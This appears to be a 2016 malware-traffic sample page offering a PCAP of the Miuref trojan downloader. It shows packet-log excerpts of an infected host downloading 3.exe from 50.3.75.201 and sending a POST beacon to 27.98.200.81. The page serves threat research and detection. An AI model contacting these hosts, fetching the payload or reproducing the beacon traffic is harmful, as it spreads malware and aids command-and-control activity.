Miuref Malware Trojan Downloader Dropper 3.exe Traffic Sample PCAP file Download 50.3.75.201 27.98.200.81

Attachment: 1 pcap 3. Date added: October 23, 2016 6:11 am. Added by: admin. File size: 19 KB. Downloads: 68.

https://www.hybrid-analysis.com/sample/e5e7d4859ca938d7cc3369099b5dc2eddb8b37f5abe53a115adec1d6e4a62d6c?environmentId=100

 

 

2016-10-23 00:38:21.122679 IP 192.168.1.102.58627 > 50.3.75.201.5450: Flags [P.], seq 0:284, ack 1, win 256, length 284
GET /3.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 50.3.75.201:5450
Connection: Keep-Alive


2016-10-23 00:38:40.506816 IP 192.168.1.102.58630 > 191.239.213.197.80: Flags [P.], seq 0:285, ack 1, win 258, length 285: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=GUID=2293236aa535f0419d025fcc74bb7e85&HASH=6a23&LV=201605&V=4&LU=1464392033590; A=I&I=AxUFAAAAAACLBgAAxLrgFeZEPolFxA6C0ICGYA!!&V=4

2016-10-23 00:38:40.609397 IP 192.168.1.102.62604 > 75.75.75.75.53: 49287+ A? www.microsoft.com. (35)
2016-10-23 00:39:17.207471 IP 192.168.1.102.58662 > 27.98.200.81.80: Flags [P.], seq 0:667, ack 1, win 256, length 667: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: 27.98.200.81
Content-Length: 456
Cache-Control: no-cache

2016-10-23 00:39:17.456625 IP 192.168.1.102.58662 > 27.98.200.81.80: Flags [.], ack 170, win 255, length 0
